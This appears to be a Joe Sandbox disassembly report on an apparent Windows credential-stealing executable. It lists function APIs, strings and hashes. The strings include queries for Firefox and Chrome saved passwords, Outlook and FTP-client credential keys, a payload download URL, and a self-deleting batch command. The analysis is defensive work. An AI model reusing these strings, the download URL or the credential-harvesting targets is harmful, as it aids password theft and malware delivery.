Opcode ID: ea589b0b73983e460bf43557bd5fc03f11857d5ef57e9652a38160b8af110ef1
Instruction ID: c6fb4472ec26e85fa1c8c8aca1d449e3f648b4c8b454689518c0d7dc9ede3b66
Opcode Fuzzy Hash: ea589b0b73983e460bf43557bd5fc03f11857d5ef57e9652a38160b8af110ef1
Instruction Fuzzy Hash: 4241B172200244AFDB109F66CC85F6AB7A9FF84725F24444EF9158B252C7B9EC91CBA4

Function 004103B4 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 161stringfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004103E6
wsprintfA.USER32 ref: 004103F4
GetModuleFileNameA.KERNEL32(?,00000104,00000105,00000105,00000105,?,00000105,004103CD), ref: 00410454
GetTempPathA.KERNEL32(00000104,?,?,00000104,00000105,00000105,00000105,?,00000105,004103CD), ref: 0041046A
lstrcatA.KERNEL32(?,?,00000104,?,?,00000104,00000105,00000105,00000105,?,00000105,004103CD), ref: 0041047E
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105,?,00000105), ref: 00410497
lstrcpyA.KERNEL32(?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105), ref: 004104AE
StrRChrIA.SHLWAPI(?,00000000,0000005C,?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104), ref: 004104BA
lstrcpyA.KERNEL32(00000001,?,?,00000000,0000005C,?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?), ref: 004104C8

Strings

ShellExecuteA, xrefs: 00410533
:ktk del %1 if exist %1 goto ktk del %0 , xrefs: 004104EA, 004104F5
open, xrefs: 0041054C
shell32.dll, xrefs: 00410525
"%s" , xrefs: 00410515
%d.bat, xrefs: 004103EC

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$CountCreateModuleNamePathTempTicklstrcatwsprintf
String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
API String ID: 2870328670-4169620016
Opcode ID: bc4a84f3c79fc088101333317eff76f951033d0f3722a173f47c29d31a4e7109
Instruction ID: d047cccf33d8b6249167d395b1d836bd11eb755a4d2d83d42c56bb33dc461b47
Opcode Fuzzy Hash: bc4a84f3c79fc088101333317eff76f951033d0f3722a173f47c29d31a4e7109
Instruction Fuzzy Hash: A141C331B442097ADF15A6A18C13FEF76B39F84708F24903A7215F52E1EEB84ED05A0C

Function 004097A0 Relevance: 36.2, APIs: 16, Strings: 8, Instructions: 238COMMON

Download Yara Rule

Strings

ftp., xrefs: 004099CA, 004099D5
http://, xrefs: 0040998B, 00409996
#2e, xrefs: 00409831
---, xrefs: 00409AA1
#2c, xrefs: 00409815
ftp://, xrefs: 0040996F, 0040997A
#2d, xrefs: 00409823
https://, xrefs: 004099A7, 004099B2

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
API String ID: 0-1526611526
Opcode ID: 15eca6765337e5dbe521305a86aba0f03b7c7552e8fa8c44529bf1a24b9a32b0
Instruction ID: 93701582a0e738582e076d95c04e7b9293532f617e131564ee79239b97e002b4
Opcode Fuzzy Hash: 15eca6765337e5dbe521305a86aba0f03b7c7552e8fa8c44529bf1a24b9a32b0
Instruction Fuzzy Hash: C2911AB1910209EADF11AFA1DC46BEEBAB5AF50348F24403BF510712E2DBBD4D91DB49

Function 00409533 Relevance: 22.7, APIs: 8, Strings: 7, Instructions: 165COMMON

Download Yara Rule

Strings

ftp., xrefs: 0040969B, 004096A6
http://, xrefs: 0040965C, 00409667
sqlite3.dll, xrefs: 00409584
mozsqlite3.dll, xrefs: 00409571
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 004095B6
ftp://, xrefs: 00409640, 0040964B
https://, xrefs: 00409678, 00409683

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
API String ID: 0-3560805513
Opcode ID: bf1a5b346e0b5851dd3d60449c78aea0bee617b5f8a4116a6bd3a9277b936cdf
Instruction ID: 819d801392f7f2c03d8ed66ffee3a92d490c7424c6f8ce20a5c7add59ca4406b
Opcode Fuzzy Hash: bf1a5b346e0b5851dd3d60449c78aea0bee617b5f8a4116a6bd3a9277b936cdf
Instruction Fuzzy Hash: 5E513AB2950609FACF12ABA1CC06FEE7A75AF50348F104037B511B01E3D7BE5E919A5E

Function 0040AF00 Relevance: 21.2, APIs: 7, Strings: 7, Instructions: 178COMMON

Download Yara Rule

APIs

Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919

wsprintfA.USER32 ref: 0040AF6C
wsprintfA.USER32 ref: 0040AF7F
wsprintfA.USER32 ref: 0040AF92
wsprintfA.USER32 ref: 0040AFA5
wsprintfA.USER32 ref: 0040AFB8
wsprintfA.USER32 ref: 0040AFCB
wsprintfA.USER32 ref: 0040AFDE

Part of subcall function 0040ADE6: lstrlenA.KERNEL32(?), ref: 0040ADFB

Part of subcall function 0040ADE6: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AEB3
Part of subcall function 0040ADE6: LocalFree.KERNEL32(00000000), ref: 0040AEE6

Part of subcall function 00401607: lstrlenA.KERNEL32(00000000), ref: 00401613

Strings

%s\Keychain, xrefs: 0040AFC3
SiteServer %d\Remote Directory, xrefs: 0040AF8A
SiteServer %d-User PW, xrefs: 0040AFB0
SiteServer %d\SFTP, xrefs: 0040AFD6
SiteServer %d\Host, xrefs: 0040AF64
SiteServer %d-User, xrefs: 0040AF9D
SiteServer %d\WebUrl, xrefs: 0040AF77

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
API String ID: 3846021373-1012938452
Opcode ID: e6ddd78442a7d5679f5a79908b51626f7bc0ab21b36978d8341d3767f9999034
Instruction ID: ec75fdc38d62598d673409a4c557277a03b196ef0f2ab6bcbb324378cde69565
Opcode Fuzzy Hash: e6ddd78442a7d5679f5a79908b51626f7bc0ab21b36978d8341d3767f9999034
Instruction Fuzzy Hash: 6F61A871C00209FEDF027F91DC46AEEBA72AF44309F14803AF525741B1DB7A5AA1EB59

Function 0040F82B Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A56D: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A5A6
Part of subcall function 0040A56D: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A5AF

Part of subcall function 0040A5B8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A5F4
Part of subcall function 0040A5B8: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A5FD

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F874
lstrcmpiA.KERNEL32(?,identification), ref: 0040F8F4
lstrcmpiA.KERNEL32(?,identitymgr), ref: 0040F909
lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0040F92C
lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0040F94B
lstrcmpiA.KERNEL32(?,identities), ref: 0040F96A
CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F9CB

Strings

identitymgr, xrefs: 0040F8FD
identification, xrefs: 0040F8E8
inetcomm server passwords, xrefs: 0040F920
identities, xrefs: 0040F95E
outlook account manager passwords, xrefs: 0040F93F

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrcmpi$ByteCharFreeMultiTaskWide
String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
API String ID: 636431001-4287852900
Opcode ID: 8222add923bd94231785fff68a27126ec6d8d0e5261508529484e0c94f16043a
Instruction ID: ef99616cb550d235511d0aaa4f60c4db959e7ed6b17d95e35f342bc68d9e3db5
Opcode Fuzzy Hash: 8222add923bd94231785fff68a27126ec6d8d0e5261508529484e0c94f16043a
Instruction Fuzzy Hash: AC41377180021DBAEF219F50CD42FDA7B79BF05344F1041BAB608B50A1DB799AD9DF98

Function 004101CD Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 117stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004017C4: GetHGlobalFromStream.OLE32(?,?), ref: 004017D1
Part of subcall function 004017C4: GlobalLock.KERNEL32(?), ref: 004017E8
Part of subcall function 004017C4: GlobalUnlock.KERNEL32(?), ref: 00401800

wsprintfA.USER32 ref: 00410238
GetTempPathA.KERNEL32(00000104,?,00000000,00000000,00000002,00000000), ref: 004102AB
GetTickCount.KERNEL32 ref: 004102C3
wsprintfA.USER32 ref: 004102D5
CreateDirectoryA.KERNEL32(?,00000000), ref: 004102E6
lstrlenA.KERNEL32(true,?,00000000), ref: 0041034E

Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C

Strings

MZ, xrefs: 0041028F
%02X, xrefs: 0041022C
http://ftp.pexgol.com/bm6dog.exe, xrefs: 004101CD, 004101EC
true, xrefs: 00410349, 00410354
%d.exe, xrefs: 004102C9

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Globallstrlen$wsprintf$CountCreateDirectoryFromLockPathStreamTempTickUnlocklstrcatlstrcpy
String ID: %02X$%d.exe$MZ$http://ftp.pexgol.com/bm6dog.exe$true
API String ID: 3085755050-2362385145
Opcode ID: c9be3085c6284c3a26056f5f745d2a80ecda3ebf2f5b3b6c2def87ebc081daa1
Instruction ID: cb83405144a39d33bbd8e6bda30171cce61964e4e6f46ecba385d9df42b6d904
Opcode Fuzzy Hash: c9be3085c6284c3a26056f5f745d2a80ecda3ebf2f5b3b6c2def87ebc081daa1
Instruction Fuzzy Hash: 37412E72800218AADF20AB61CC4ABEEB7B99B15305F1041F7B958B11E1DABD4FC4CF58

Function 00403488 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 135networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919

InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403508
InternetCreateUrlA.WININET(0000003C,80000000,?,00001FFF), ref: 00403533
InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 0040357A
ObtainUserAgentString.URLMON(00000000,?,00002000), ref: 00403597
wsprintfA.USER32 ref: 004035B1
wsprintfA.USER32 ref: 004035CE
lstrlenA.KERNEL32(?,00002000,00002000,00002000), ref: 004035F1
closesocket.WSOCK32(?,?,00002000,00002000,00002000), ref: 0040361B

Strings

GET %s HTTP/1.0Host: %sAccept-Language: en-USAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: %s, xrefs: 004035A9, 004035C6
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0), xrefs: 004035BB

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Internet$Crackwsprintf$AgentAllocCreateLocalObtainStringUserclosesocketlstrlen
String ID: GET %s HTTP/1.0Host: %sAccept-Language: en-USAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: %s$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
API String ID: 1473867801-577339357
Opcode ID: 91bdcfba5857ec0c211edceb1081f740dd30d4d899aef2bcd2e10ecfd0b883a9
Instruction ID: 9777c4ed4c5b2ee9316af053b9d13fa9bd4ac9f8c942a2f3ec3f1b1e4d0d9db1
Opcode Fuzzy Hash: 91bdcfba5857ec0c211edceb1081f740dd30d4d899aef2bcd2e10ecfd0b883a9
Instruction Fuzzy Hash: BF510A72D04209FAEF11AFD1CC42BEDBE79AF0430AF10403AF511B52A1D7B95A52DB19

Function 00402E9D Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 67registryCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,explorer.exe,00000002,00000000), ref: 00402DD9
ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe,00000002,00000000), ref: 00402DFD
OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402E27
OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402E43
ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402E50
RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402E71
CloseHandle.KERNEL32(?), ref: 00402EA2
CloseHandle.KERNEL32(?,?), ref: 00402EAA
CloseHandle.KERNEL32(?), ref: 00402EB4
Process32Next.KERNEL32(?,00000128), ref: 00402EC6
CloseHandle.KERNEL32(?,00000002,00000000), ref: 00402ED6

Strings

explorer.exe, xrefs: 00402DCD

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
String ID: explorer.exe
API String ID: 3144406365-3187896405
Opcode ID: 08f40fb6d44563ca32729fa00ebbfbd7ada4dea461e43912d0a36bf701304b82
Instruction ID: a2c78e65942944609eb9e6a2c921facc2d1892735b8c183ce11cefcb4c4c06b2
Opcode Fuzzy Hash: 08f40fb6d44563ca32729fa00ebbfbd7ada4dea461e43912d0a36bf701304b82
Instruction Fuzzy Hash: 85218032A40119EBDF229B90CD49BEE7674AF04304F1440B3A608F51D1D7B89ED0DF98

Function 0040BCFA Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 63stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040294B: lstrlenA.KERNEL32(?), ref: 0040297F

StrStrIA.SHLWAPI(?,00415E66), ref: 0040BD0E
lstrcmpiA.KERNEL32(CONSTRAINT,?), ref: 0040BD30

Strings

username_value, xrefs: 0040BD91
password_value, xrefs: 0040BD77
origin_url, xrefs: 0040BD5D
CONSTRAINT, xrefs: 0040BD27, 0040BD2F

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrcmpilstrlen
String ID: CONSTRAINT$origin_url$password_value$username_value
API String ID: 3649823140-2401479949
Opcode ID: 22a1df6da15ee93e844beba5c23c9a2cd52371af7b3e65fbb9d11862cf7c5522
Instruction ID: 549c6056515963588f9c1146d25089613da6e7bea94f329fa0bd8592f56e9fc9
Opcode Fuzzy Hash: 22a1df6da15ee93e844beba5c23c9a2cd52371af7b3e65fbb9d11862cf7c5522
Instruction Fuzzy Hash: 95112E73650605E9CF112B25DC02EDE7A51EFB5398B048037F858A41E1E7BDCAD1975C

Function 00409D85 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119COMMON

Download Yara Rule

Strings

Path, xrefs: 00409E54
Profile, xrefs: 00409E35
profiles.ini, xrefs: 00409DD6
IsRelative, xrefs: 00409E68

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 0-4107377610
Opcode ID: 9d9c89784d7f7bbd85dc3e2337b9e06639f09dd76c69a63164768edded6efc33
Instruction ID: d858c12de6229d8d70ef6c10e3873df91c46ce366050ec7153196185a8c1e61a
Opcode Fuzzy Hash: 9d9c89784d7f7bbd85dc3e2337b9e06639f09dd76c69a63164768edded6efc33
Instruction Fuzzy Hash: 13414F72950206BACF226B61CC02EEF7B72AF50358F14457BB424741F2DB7E4DA1AB49

Function 004046EA Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004046F8
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404710
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00404721
GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00404730

Strings

kernel32.dll, xrefs: 004046F3
GetNativeSystemInfo, xrefs: 0040470A
IsWow64Process, xrefs: 0040471B

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: AddressProc$CurrentHandleModuleProcess
String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
API String ID: 977827838-3073145729
Opcode ID: 1bbb540219231b58824e5ab77e48160b5774ed33d0de01fcb38bdce5d520b492
Instruction ID: 7c28e420826eabaaf05b666c02c110936013fafb471106d1de9b0548cecc0825
Opcode Fuzzy Hash: 1bbb540219231b58824e5ab77e48160b5774ed33d0de01fcb38bdce5d520b492
Instruction Fuzzy Hash: 8CF030B771030866CB1172B9AC46BEF21DC8BD13E5F2A0577A111F72C1EABCCD804269

Function 0040DB12 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON

Download Yara Rule

Strings

value=", xrefs: 0040DB9D, 0040DBB0
<setting name=", xrefs: 0040DB5F, 0040DB75

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: <setting name="$value="
API String ID: 0-3468128162
Opcode ID: b43be731758bd1bacb88d17d9386c407736c9e079e5ee7bf1f106b048158055e
Instruction ID: 194ceef87dfbcb69aef3b57f18e8d6d2d392925be7a5bad02b64de4594db0886
Opcode Fuzzy Hash: b43be731758bd1bacb88d17d9386c407736c9e079e5ee7bf1f106b048158055e
Instruction Fuzzy Hash: D831E672D082599ECB11ABE08C42AFE7FB19F16318F1500A7F401B3292D27D5E44DB6D

Function 0040203A Relevance: 10.6, APIs: 7, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040205B
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402069
CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040207D
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402092
CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004020A1
CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004020A8
CloseHandle.KERNEL32(?,00000000,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004020B7

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$Create$MappingSizeView
String ID:
API String ID: 3733816638-0
Opcode ID: 4c2131ddec283f7362195489ee9faca0348458e052251f6b49f45dba0ad7f2a7
Instruction ID: 6ff59398d09ff71369010619fbe8f939629311b037752696d147ce4a1850af33
Opcode Fuzzy Hash: 4c2131ddec283f7362195489ee9faca0348458e052251f6b49f45dba0ad7f2a7
Instruction Fuzzy Hash: 811152B1290300BAEF312F75CC87F553A94AB11B58F648166B714BD1D6DAF89880C71D

Function 004089A0 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

http://, xrefs: 00408B65
https://, xrefs: 00408B76
ftp://, xrefs: 00408B54

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: ftp://$http://$https://
API String ID: 0-2804853444
Opcode ID: 422e00a736fdf7ffc5ed8a188e6e05459ba2a1bb1e396985e275d1436b7afc8b
Instruction ID: 261c2f2b83a7ad3ffecd7f8a3ac648be864c99f0da7d8168c567202a184b1b20
Opcode Fuzzy Hash: 422e00a736fdf7ffc5ed8a188e6e05459ba2a1bb1e396985e275d1436b7afc8b
Instruction Fuzzy Hash: 9D612672900108FEDF11AF91CD01AEEBB79EF04348F40807BB841B51A1DB7A9B94DB99

Function 0040E3BC Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

"/>, xrefs: 0040E42E
winex=", xrefs: 0040E409, 0040E41F

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: "/>$winex="
API String ID: 0-1498080979
Opcode ID: 71b9f5829aad57cee214cc7e725d5a8c9d7fd70879b2c8b13c194a81f8eb12bc
Instruction ID: 9d1d581915e091d244ed3be2239e5641f0114326bb8b50a03fb89d61f8d95767
Opcode Fuzzy Hash: 71b9f5829aad57cee214cc7e725d5a8c9d7fd70879b2c8b13c194a81f8eb12bc
Instruction Fuzzy Hash: E4316E72810109BECF016BA2CC02DEE7A76AF54348F144437F511B51B2DB7D5A61EB59

Function 00408435 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00542E18,FTPCON), ref: 00408463
StrStrIA.SHLWAPI(00541FA8,FTP CONTROL,00000000,00542E18,FTPCON), ref: 0040846F

Strings

FTPCON, xrefs: 0040845D
\Profiles, xrefs: 00408483
.prf, xrefs: 00408494
FTP CONTROL, xrefs: 00408469

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
